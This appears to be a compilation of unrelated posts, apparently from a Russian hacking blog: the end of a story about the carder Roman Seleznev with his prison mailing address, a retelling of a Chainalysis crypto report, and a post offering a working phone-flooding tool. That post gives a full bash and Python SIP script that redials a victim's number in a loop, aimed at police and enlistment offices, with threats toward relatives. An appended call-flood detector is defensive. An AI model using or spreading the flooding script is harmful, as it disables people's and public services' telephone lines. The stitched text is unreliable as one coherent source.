This guy had a difficult childhood. A difficult adolescence. A luxurious youth. What kind of old age awaits him? You have probably understood everything already. Roman Seleznev evokes conflicting emotions. You can hate him, you can admire his tenacity or you can mock the mistakes he made. But it cannot be denied that all the events in his life are connected with each other. And the question is what exactly you would have done in his place.

And there were people in Roman’s life who somehow influenced him; people he trusted. He saw his father only a few times throughout his childhood. The boy was not needed by his dad, who was building his political career in the capital of Russia. But as soon as the carder made his first million, his father Valerii Seleznev appeared in his life. They often met in Moscow, where Psycho periodically ‘had’ to fly in order to ‘cash out’ profits.

Almost all serious cyber crooks remember the Webmoney ‘depositories’ – first on Pyatnitskaya st., then on Sadovnicheskaya Embankment and Ordzhonikidze st. (locations in Moscow city – added by N.) Carders such as Seleznev took bags full of money out of these semi-basements. Roman was no exception. Valerii contacted his son during one such visit and offered to meet him at his office in the hotel Ukraine, where an amazing family reunion took place. After that, Roma visited his father, who set him on the right path and suggested investing in a ‘long-term construction’ in Vladivostok. Roman periodically supplied his father with money – the exact amount is unknown, but the parental debts ended up in the millions. Once nCux was arrested, Seleznev Sr. opened a bank vault in one of the banks in Vladivostok and took out several million that were stashed there. The fate of the real estate in Bali is unknown to this day.

After his son’s arrest, the father launched furious international activity: paying lawyers hundreds of thousands of dollars, bribing Russian Foreign Ministry officials, lodging official protests.

It is difficult to say what specific information Valerii Seleznev had, but his advice often seemed surreal, unless Seleznev Sr. did not want Roman to be released. Given the cases of Yaroshenko and Bout, it was difficult to expect that the United States would treat Seleznev any differently. The Americans had 100% proof of Seleznev’s guilt. And even if the defense argued that the laptop with stolen information had been planted on Seleznev, there were still Tsurikov and Horohorin. Both were closely acquainted with Psycho and his activities, and both cooperated with the US Government. Even the best lawyers in the world could not help. Only Roman was able to help himself: make a deal with the government and admit his own guilt. This was the only way to soften the indictment.

But Roman’s father continued to assure him, right over the prison phone, that there were options such as ‘Uncle Andrei’, a political solution to the issue and an ‘improvement in the international situation’. This played into the hands of the Americans, who insisted on the corruption of Russian politics, and thereby worsened his son’s conditions of detention and his relations with the US Government. Even a fool understood that the conversation would be recorded, listened to and analyzed. There were real consequences. The case really became political, and Roman was sent to solitary confinement. The last hopes for cooperation were lost; the Americans were furious. The situation looked doubly stupid since Seleznev had already started to cooperate and told a lot, then stopped, stalled for time, changed lawyers and turned to the ‘Uncle Andrei’ options. All this under the leadership of Valerii Seleznev.

Roman initially refused to cooperate during his imprisonment, but then changed his mind and repeatedly offered his services and tried to provide valuable information. He managed to get a meeting with special agents, during which he revealed the names of many participants of carding forums from 2005 to 2014 to the authorities. But the Secret Service refused to cooperate because most of this information was already known. In addition, Roman made some statements that were false and nullified the value of cooperation.

The ‘Uncle Andrei’ scenario worked very well – it infuriated not only the agents, but also the judge. The defense filed a notice to withdraw from the case due to disagreements with the client before the hearings. The meeting was postponed from May 2015 to November 2015. The case postponement resulted in additional costs due to the fact that the witnesses in the case had already flown to the Seattle court from Sri Lanka, Honolulu and Chicago.

Before the verdict, Seleznev wrote a handwritten letter to the court in which he briefly recounted his biography, mentioned his difficult childhood and described how he had tried to earn money and stepped onto the slippery slope of carding.

‘I tried to find a job on the Internet and things started to go downhill. I chose the wrong path’.

But it was already too late. Just like before the terrorist attack in Marrakesh, when they told him: ‘It’s a bad idea’. But he had already made his choice and there was no turning back.

THE END

Seleznev was sentenced in April 2017, when the story of the alleged interference of Russian hackers in the US presidential election was on everyone’s mind for several months. He was given 27 years – the longest sentence given to a cybercriminal in the US ever. ‘I am a political prisoner. I am a tool for the US government’, – Seleznev said after the verdict. ‘They want to send a signal to the whole world using me as a pawn. Given my head injury, today’s sentence could be considered a death sentence’.

His father called the decision ‘the verdict of cannibals’. In September 2017, Seleznev pleaded guilty to two more cases – in which the losses amounted to about $52 million.

P.S. If you are faced with a choice right now, think carefully and look around. The Universe, God, the matrix, or whoever you believe in will definitely give you a sign. And no matter what past you have behind you, your future is in your hands.

P.P.S. Roman Seleznev is now in a specialized medical prison in North Carolina – FCI Butner Medium. He is in his cell around the clock due to the epidemiological situation. He hopes for a pardon from Trump, or at least for the opportunity to live under guard outside of prison during the epidemic. His chances of survival are not great while he is locked up. Current release date: 07/06/2037. If you want to cheer the guy up, write letters to him:

ROMAN SELEZNEV

Register Number: 04385-093

FCI Butner Medium II

P.O. BOX 1500

BUTNER, NC 27509
UNITED STATES OF AMERICA

P.P.P.S: Comments by Svetlana Smulskaya, Roman’s ex-wife:

Vlad, don’t write about what you don’t know! By the way, I saved Roman’s life in Morocco and carried him after resuscitation! I washed him and cleaned up after him when he could hardly walk and after discharge I went with him to all the doctors! And it was my duty as a wife, which I performed! And the fact that Roma beat me when he recovered in front of Eva, he didn’t mention in the correspondence, no?! And when he beat me, I didn’t even fight back because I was afraid that I would accidentally hit the parts of the head where part of the skull had been removed. So, I endured.

Didn’t you know that he cheated on me when he flew to Moscow for months to see his one-armed dad?! Didn’t he say that he and Anton robbed my apartment and took everything out?! I didn’t run away, but left after the OFFICIAL divorce and division of property! I’m tired of threats that if I don’t give the child to him, then he will stuff me with drugs and hand me over to the hospital by means of money and connections and take Eva away. Is it fine?! I don’t think so.

I’ll tell you, if you don’t know … the property (two houses and 4 hotel rooms) in Bali – everything went to Roma. It was originally issued to me, but I gave a power of attorney and he re-registered everything for himself or his father in the process of divorce – I don’t remember exactly.

I understand that accusing women of villainy and commercialism is a trend, but what you wrote about me is a lie. It was hard to read. A coin always has two sides. And, hey, couldn’t you have chosen a better photo?! I look a fright on it: drunk and angry, ‘cause Roman pulled your beanpole for boobs in front of my eyes!

2022: To the moon? Cryptocurrency market activity in Eastern Europe and the past year's spikes caused by the war between Russia and Ukraine

Remember how at the start of the year everyone was waiting for 2themoon? Bitcoin at a hundred grand? Or at least at 70.

Then came instability on the stock market. Then Russia started terrorizing everyone, first knocking bitcoin down by almost 10k with its statements about outlawing it.

Then the war began.

But let's take a careful look. Eastern Europe is the fifth-largest cryptocurrency market: it received $630.9 billion between July 2021 and June 2022. That is just over 10% of global transaction activity.

Eastern Europe's role in the overall global crypto ecosystem has remained surprisingly stable over the past few years, usually holding at around 10%. Other regions, by contrast, have seen greater volatility.

Other research has paid a lot of attention to Eastern Europe's role in cryptocurrency crime, Russia's in particular. Specifically, Eastern Europe has historically seen a disproportionate amount of ransomware and cryptocurrency-based money laundering, the latter supported by a large ecosystem of risky cryptocurrency businesses. Some of these businesses, such as the over-the-counter (OTC) exchange Suex, were even sanctioned by the US Treasury Department as a result of their activity in 2021. Nevertheless, risky and illicit activity still features prominently when we look at on-chain activity in Eastern Europe: high-risk exchanges, those with no or low KYC requirements, account for 6.1% of transaction activity in the region, compared with 1.2% in the next-closest region. In fact, if we combine addresses associated with risky and illicit activity, we see that users in Eastern Europe interact with them far more often than users in other regions.

Cryptocurrency market (c) Chainalysis

Please note: illicit activity refers to transactions in which one or more counterparty addresses are associated with a criminal entity. Risky activity refers to transactions in which one or more counterparty addresses are associated with a risky entity, for example a high-risk exchange or a service headquartered in a high-risk jurisdiction.

18.2% of all cryptocurrency received by Eastern Europe came from addresses associated with risky or illicit activity, more than in any other region.

Market changes and the role of cryptocurrency in the Russian-Ukrainian war

Of course, the biggest news in Eastern Europe over the past year was Russia's invasion of Ukraine in February 2022 and the fighting that has continued since. The war has affected practically every aspect of life in the two countries, and cryptocurrency is no exception.

Soon after the war began, the US and a number of other countries started imposing sanctions on Russian oligarchs and other individuals connected to Vladimir Putin's government. This, combined with Russia's historical use of cryptocurrency for both legitimate and illicit purposes, raised questions about whether Russians would try to use cryptocurrency to evade sanctions. Our research showed that cryptocurrency markets are most likely not liquid enough to support mass, systematic sanctions evasion. Given this, and given that this report is devoted to grassroots cryptocurrency adoption, we will use on-chain data to analyze how the broad populations of both countries turned to cryptocurrency after the war began, not just the wealthy or those subject to sanctions.

After all, the war has had a serious economic impact on citizens of both countries. Ukraine is experiencing extremely high inflation: a July article in the New York Times reports a 90% rise in the cost of fuel and a 35% rise in the cost of food. Russia also saw high inflation after the invasion, and it has faced difficulties in international trade, in particular with the export of goods such as oil, because of its exclusion from the SWIFT banking network. With that context in mind, let's look at how cryptocurrency usage in Russia and Ukraine changed with the start of the war. It can be noted right away that in March 2022, soon after the war began on February 24, both countries saw an initial rise in cryptocurrency transfers.

After that, however, the trends diverge. In Russia, transactions rose and fell within a relatively narrow range in the following months. In Ukraine, by contrast, cryptocurrency transfers grew steadily from the very start of the war until June 2022. It is possible that the cryptocurrency activity of Russian users was affected by the restrictions many services imposed on them in response to the invasion.

Of course, given the economic problems both countries face, overall transactions may not be where we would expect to find the most telling trends. Most of this transaction activity consists of crypto-to-crypto trades, whereas in an emergency or under potential hyperinflation people can be expected to focus more on protecting or moving their fiat assets. This can be measured at least partially by looking at trading volume denominated in Russian rubles and Ukrainian hryvnias, using order book data from two exchanges that accept these currencies: Binance and LocalBitcoins.

(c) Chainalysis

Here the trend is even stronger, especially in March, right after the war began. In that month, trading volume in Ukrainian hryvnias grew by 121% (to $307 million), and trading volume in Russian rubles grew by 35% (to $805 million). After that, trading volumes for both countries decline, at times picking up and then falling again in August, without ever reaching the March highs. The true scale of this activity is most likely much higher than the figures given above, since the data comes from only two exchanges that accept the fiat currencies of both countries. Still, this information is enough to draw conclusions about the direction of the trends.

The data was shared with Tatiana Dmitrenko, a high-ranking adviser to Ukraine's Ministry of Finance and a member of the World Economic Forum's Digital Assets Task Force, in order to clarify which use cases could have led to the surge in hryvnia-for-cryptocurrency trading. She pointed to the currency controls introduced by the Ukrainian government. “In connection with the introduction of martial law in Ukraine, the Ukrainian Central Bank introduced restrictions on cash foreign-currency transactions, such as purchasing dollars or euros”, she said. Soon afterwards, transfers of foreign currency abroad were also restricted. Dmitrenko believes that some Ukrainians may have wanted to exchange their hryvnias for cryptocurrency in response to these measures. She also noted that these currency controls were eased in July 2022, and at that point hryvnia-for-cryptocurrency trading declines.

To learn more about similar activity in Russia, an interview was conducted with a regional money-laundering expert who has worked with financial intelligence units in Eastern Europe as well as with several international organizations. Although he asked to remain anonymous, he gave permission to quote his words on how to interpret this data in light of what he has seen in Russia since the start of the war.

“The main question, not only for oligarchs but also for ordinary Russians, became: ‘How do I get money out of Russia?’”, the expert said. “Many began looking for new places where they could cash out their cryptocurrency.” The UAE and Turkey were named as countries that had been relied on in the past. Kazakhstan and Georgia were also noted as countries that could meet the increased demand for such services after the war began. Although this activity is hard to quantify, the use from these countries of cryptocurrency services that mainly serve Russian users can be a useful proxy. In all four countries, visits to Russian cryptocurrency services surged after the war began in February, as shown in the chart below.

(c) Chainalysis

The expert also told us about the role cryptocurrency may play in financing Russia's foreign trade after its exclusion from SWIFT. Russia's national bank recently agreed to legalize the use of cryptocurrency for cross-border payments and international trade, and the expert said that, in his opinion, some Russian companies have already begun carrying out such transactions. “This is probably already happening on a small and medium scale, but it could become more widespread.” The expert named China and Iran as possible trading partners in such a scheme, noting that the latter has already begun experimenting with cryptocurrency for imports. He also explained that stablecoins would most likely be the preferred medium of exchange, since they are not subject to the price volatility of assets such as bitcoin. Data from Chainalysis.com indicates that stablecoin usage in Russia has indeed grown since the start of the war.

(c) Chainalysis

In January, stablecoins accounted for 42% of transaction volume on predominantly Russian services. That share rose sharply to 55% in February and 67% in March, after the invasion. Although part of this growth may be driven by businesses using cryptocurrency for international transactions, it is also likely that part of it is driven by ordinary Russian citizens trading stablecoins to protect the value of their assets, as discussed earlier.

The “cryptocurrency for imports” scheme raises many questions about how to make sanctions against Russia more effective 😉 One area where cryptocurrency has also proven effective is donations for Ukraine's needs. Since the start of the war, cryptocurrency users have donated more than $65 million to humanitarian aid, demonstrating the power cryptocurrency can have to unite people across borders in support of international causes.

Source:

[https://blog.chainalysis.com/reports/eastern-europe-cryptocurrency-geography-report-2022-preview/?utm_campaign=Blog&utm_source=twitter&utm_medium=OrganicSocial]

Phone flooding. How to flood the phone of the police or a military enlistment office for free

Think only websites can be DDoSed? Think again. Sick to death of the fucking bailiff? Getting calls from the enlistment office? Being invited to the police station? There is a solution. Tell them their phone wasn't working. Arranging that is not difficult at all. With just one free IP telephony account, a single-line or mobile phone can be torn to shreds with calls. You can piss off anyone you like, the choice is yours.

We have already done everything. For the software to work, you need to open a free account with one of the great many SIP operators and find out how many simultaneous outgoing streams they provide; both Russian and foreign ones will do.

When the attack is against landline and mobile phones, the script will not spend any money at all. The way the script works is that it dials the victim's number in several streams and immediately hangs up. And that is one stream. Most ordinary telephony operators allow 3 simultaneous outgoing streams, which means that while one stream has “finished ringing”, the second is already connecting and the third is on its way.

Tests showed that with an ordinary Russian IP telephony operator allowing 3 outgoing streams, a mobile phone became unusable for the duration of the attack.

20 accounts (all foreign, let the chekists know where the attack was prepared from; yes, yes, you fucking assholes, not even against ordinary people but specifically against you scum) with varying numbers of outgoing streams made the multi-line phone of the FSB reception office for Moscow and the Moscow region completely unusable.

We deliberately simplified the code as much as possible: all you need is to fill in the account details, install Python3 and the PyTwinkle library (pip3 install pytwinkle) and run the script with the victim's number. Want multithreading? No problem; we deliberately did not bother making the code more complex, so that it would be easier for you to understand how the flooder works. Just install something like screen and launch the script in several threads straight from the console. It doesn't need to be any more complicated than that.

It is all as simple as a Siberian bast shoe, which is exactly what the Russian “siloviki” will be getting spanked with.

P.S. We stand for freedom of speech in general and of code in particular. That is exactly why we are providing it in open form. However, if we notice it being used against Ukraine, we are hinting that we have far more sophisticated versions of it and terabytes of logs in which there is a shitload of this SIP. It will not only be the cops' phones that ring, but even those of your katsap mother, grandmother and mother-in-law.

You fill in the settings from your SIP provider, save it as fuckphone.sh and run it with the victim's number. And the subscriber is no longer a subscriber and is slowly moving into a hell of phone calls.

Download: https://cybersec.org/files/fuck_phone.zip

#!/bin/bash
cd ~
mkdir .twinkle
cd .twinkle

cat <<EOF > twinkle.cfg
# USER
user_name=${SIP_USER}
user_domain=${SIP_SERVER}
user_display=${SIP_USER}
user_organization=
auth_realm=
auth_name=${SIP_USER}
auth_pass=${SIP_PASS}
auth_aka_op=00000000000000000000000000000000
auth_aka_amf=0000

# SIP SERVER
outbound_proxy=
all_requests_to_proxy=no
registrar=${SIP_SERVER}
register_at_startup=yes
registration_time=3600
reg_add_qvalue=no
reg_qvalue=1

# RTP AUDIO
codecs=speex-wb,speex-nb,g711a,g711u,gsm
ptime=20
out_far_end_codec_pref=yes
in_far_end_codec_pref=yes
speex_nb_payload_type=97
speex_wb_payload_type=98
speex_uwb_payload_type=99
speex_bit_rate_type=cbr
speex_dtx=no
speex_penh=yes
speex_quality=6
speex_complexity=3
speex_dsp_vad=yes
speex_dsp_agc=yes
speex_dsp_aec=no
speex_dsp_nrd=yes
speex_dsp_agc_level=20
ilbc_payload_type=96
ilbc_mode=30
g726_16_payload_type=102
g726_24_payload_type=103
g726_32_payload_type=104
g726_40_payload_type=105
g726_packing=rfc3551
dtmf_transport=auto
dtmf_payload_type=101
dtmf_duration=100
dtmf_pause=40
dtmf_volume=10

# SIP PROTOCOL
hold_variant=rfc3264
check_max_forwards=no
allow_missing_contact_reg=yes
registration_time_in_contact=yes
compact_headers=no
encode_multi_values_as_list=yes
use_domain_in_contact=no
allow_sdp_change=no
allow_redirection=yes
ask_user_to_redirect=yes
max_redirections=5
ext_100rel=supported
ext_replaces=yes
referee_hold=no
referrer_hold=yes
allow_refer=yes
ask_user_to_refer=yes
auto_refresh_refer_sub=no
attended_refer_to_aor=no
allow_xfer_consult_inprog=no
send_p_preferred_id=no

# Transport/NAT
sip_transport=auto
sip_transport_udp_threshold=1300
nat_public_ip=
stun_server=
persistent_tcp=yes
enable_nat_keepalive=no

# TIMERS
timer_noanswer=30
timer_nat_keepalive=30
timer_tcp_ping=30

# ADDRESS FORMAT
display_useronly_phone=yes
numerical_user_is_phone=no
remove_special_phone_symbols=yes
special_phone_symbols=-()/.
use_tel_uri_for_phone=no

# RING TONES
ringtone_file=
ringback_file=

# SCRIPTS
script_incoming_call=
script_in_call_answered=
script_in_call_failed=
script_outgoing_call=
script_out_call_answered=
script_out_call_failed=
script_local_release=
script_remote_release=

# NUMBER CONVERSION

# SECURITY
zrtp_enabled=no
zrtp_goclear_warning=yes
zrtp_sdp=yes
zrtp_send_if_supported=no

# MWI
mwi_sollicited=no
mwi_user=
mwi_server=
mwi_via_proxy=no
mwi_subscription_time=3600
mwi_vm_address=

# INSTANT MESSAGE
im_max_sessions=10
im_send_iscomposing=yes

# PRESENCE
pres_subscription_time=3600
pres_publication_time=3600
pres_publish_startup=yes

EOF


cat <<EOF > sip.py
#!/usr/bin/env python3
import time
import sys
import socket
import socks
from pytwinkle import Twinkle

#socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, '127.0.0.1', 9050)
#socket.socket = socks.socksocket

target=sys.argv[1]

def loopcall():
    for x in range(0, 1000):
        mTP.call("sip:"+target+"@${SIP_SERVER}")
        time.sleep(5.1)
        mTP.bye()

def callback(event, *args):
    print(event)
    if event=="registration_succeeded":
        uri, expires = args
        print("registratiom succeeded, uri: %s, expires in %s seconds"%(uri, expires))
        loopcall()

    if event=="cancelled_call":
        line=args[0]
        print("call cancelled, line: %s"%(line))
        loopcall()

    if event=="answered_call":
        call=args[0]
        print("answered: %s"%(str(call)))
        mTP.bye()
        loopcall()

    if event=="ended_call":
        line=args[0]
        print("call ended, line: %s"%(line))
        loopcall()

mTP = Twinkle(callback)
mTP.run()

EOF


chmod 755 sip.py

sudo ./sip.py ${TARGET}
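
Seen from the receiving side, the call pattern this post describes (one number dialled over several concurrent channels, each call ringing for a few seconds and then hung up) stands out in call detail records. The following is an added example, not part of the original post: a sliding-window detector a PBX or carrier operator could run over its CDRs. The record fields, thresholds and sample calls are assumptions constructed for illustration.

```python
from collections import Counter, defaultdict, deque
from dataclasses import dataclass
from datetime import datetime, timedelta
from statistics import pstdev


@dataclass(frozen=True)
class Call:
    start: datetime
    src: str        # originating SIP account or trunk (assumed CDR field)
    dst: str        # dialled number
    ring_s: float   # seconds between INVITE and answer/cancel
    talk_s: float   # seconds of media after answer (0 if never answered)


@dataclass(frozen=True)
class Alert:
    dst: str
    calls: int              # short attempts inside the densest window
    first: datetime
    last: datetime
    sources: dict           # attempts per source, for rate limiting/blocking
    peak_concurrency: int   # channels in use at once
    ring_stdev: float       # near zero means timer-driven, automated dialling


def build_sample():
    """Constructed CDRs, not real traffic."""
    t0 = datetime(2022, 1, 1, 9, 0, 0)
    calls = []
    # Flood: one account, three outbound channels, each ringing 5.1 s,
    # hanging up and redialling every 5.5 s, all aimed at one number.
    for offset in (0.0, 1.8, 3.6):
        for n in range(20):
            start = t0 + timedelta(seconds=offset) + n * timedelta(seconds=5.5)
            calls.append(Call(start, "acct-flood", "5550100", 5.1, 0.0))
    # Ordinary traffic: answered calls and a few missed calls from one caller.
    normal = [("alice", "5550100", 7.0, 95.0), ("bob", "5550123", 4.0, 0.0),
              ("carol", "5550123", 12.0, 40.0), ("bob", "5550123", 6.0, 0.0),
              ("dave", "5550100", 3.0, 210.0), ("bob", "5550123", 5.0, 0.0)]
    for n, (src, dst, ring, talk) in enumerate(normal):
        calls.append(Call(t0 + timedelta(seconds=17 * n), src, dst, ring, talk))
    return calls


def peak_concurrency(calls):
    """Largest number of calls that overlap in time."""
    events = []
    for c in calls:
        events.append((c.start, 1))
        events.append((c.start + timedelta(seconds=c.ring_s + c.talk_s), -1))
    live = peak = 0
    for _, delta in sorted(events):  # at equal times, ends sort before starts
        live += delta
        peak = max(peak, live)
    return peak


def detect_floods(calls, window=timedelta(seconds=60), min_calls=15,
                  max_ring=8.0, max_talk=1.0):
    """Flag numbers that receive a burst of short, effectively unanswered calls."""
    short = defaultdict(list)
    for c in calls:
        if c.ring_s <= max_ring and c.talk_s <= max_talk:
            short[c.dst].append(c)
    alerts = []
    for dst, attempts in sorted(short.items()):
        attempts.sort(key=lambda c: c.start)
        win, best = deque(), []
        for c in attempts:
            win.append(c)
            while c.start - win[0].start > window:
                win.popleft()
            if len(win) >= min_calls and len(win) > len(best):
                best = list(win)  # keep the densest window seen so far
        if best:
            alerts.append(Alert(
                dst=dst, calls=len(best), first=best[0].start,
                last=best[-1].start,
                sources=dict(Counter(c.src for c in best)),
                peak_concurrency=peak_concurrency(best),
                ring_stdev=pstdev(c.ring_s for c in best)))
    return alerts


if __name__ == "__main__":
    for a in detect_floods(build_sample()):
        print(f"{a.dst}: {a.calls} short calls between {a.first:%H:%M:%S} and "
              f"{a.last:%H:%M:%S}, peak concurrency {a.peak_concurrency}, "
              f"ring stdev {a.ring_stdev:.2f}s, sources {a.sources}")
```

The `sources` map is what a responder acts on: per-account limits on concurrent and per-minute call attempts at the SIP provider or session border controller cut this pattern off without touching answered calls.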